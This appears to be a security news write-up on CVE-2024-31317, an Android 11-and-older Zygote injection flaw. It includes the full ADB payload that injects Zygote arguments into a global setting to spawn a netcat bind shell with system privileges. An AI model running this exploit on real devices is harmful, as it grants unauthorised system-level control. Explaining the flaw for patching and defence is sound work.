A critical Android vulnerability identified as CVE-2024-31317 has been discovered that allows attackers to execute arbitrary code with system privileges.
The “Zygote Injection” vulnerability affects devices running Android 11 or older and enables attackers to escalate privileges from a shell user to the system user, potentially compromising entire devices.
The vulnerability has been described by security researchers as possibly the most valuable userspace Android vulnerability in recent years.
.png
)
The vulnerability targets Android’s Zygote process, a crucial component in the operating system responsible for forking new applications and system processes.
When an Android device powers on, after the Linux kernel initializes, it launches essential Android services including the Zygote process, which runs with system privileges.
This makes Zygote an attractive target for attackers seeking elevated access to Android devices.
Security researchers at Infosec found that Android’s hidden_api_blacklist_exemptions global setting, which allows certain apps to bypass Android’s hidden API restrictions, can be manipulated to inject malicious commands.
The System Server component does not properly escape newline characters when passing commands to the Zygote process, creating a critical injection point.
This occurs because System Server’s update() method is called whenever the hidden_api_blacklist_exemptions setting changes, and it passes this setting directly to Zygote without proper sanitization.
Exploitation requires the WRITE_SECURE_SETTINGS permission, which is available to ADB shell and certain pre-installed system apps.
.webp)
While unprivileged apps cannot alter this setting, security researchers demonstrated that when a malicious actor modifies the hidden_api_blacklist_exemptions setting with injected newlines, they can append arbitrary Zygote commands that the system treats as legitimate commands for process creation.
Technical Exploitation
The vulnerability can be exploited through a sequence of ADB commands on a device with USB debugging enabled.
First, the attacker stops the settings app and injects a payload into the hidden_api_blacklist_exemptions setting by executing these commands:-
am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread "
am start -a android.settings.SETTINGS.webp)
This payload creates a persistent netcat listener on port 1234 that provides shell access with system privileges.
The exploit works by injecting a specially crafted command where the critical element is the –invoke-with parameter, which executes netcat before the process actually runs, binding a shell to localhost on port 1234.
After execution, connecting with “nc localhost 1234” provides a system-level shell, allowing the attacker to run commands with elevated privileges.
Users should be cautious as exploiting this vulnerability can cause device bootloops because the modified setting persists across reboots and directly affects how Zygote spawns processes.
If this occurs, users may still access the device via ADB and fix it by deleting the modified setting with “settings delete global hidden_api_blacklist_exemptions” followed by a reboot.
Android devices should be updated to the latest security patches to mitigate this serious vulnerability, especially since it affects all Android versions up to Android 11.
The Android Zygote Injection vulnerability demonstrates how seemingly minor input validation issues can lead to system-wide security compromises.
While this vulnerability primarily affects older Android versions, it highlights the importance of proper security boundaries in operating system design.
Users are advised to keep their devices updated and be cautious about enabling USB debugging except when absolutely necessary for development purposes.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
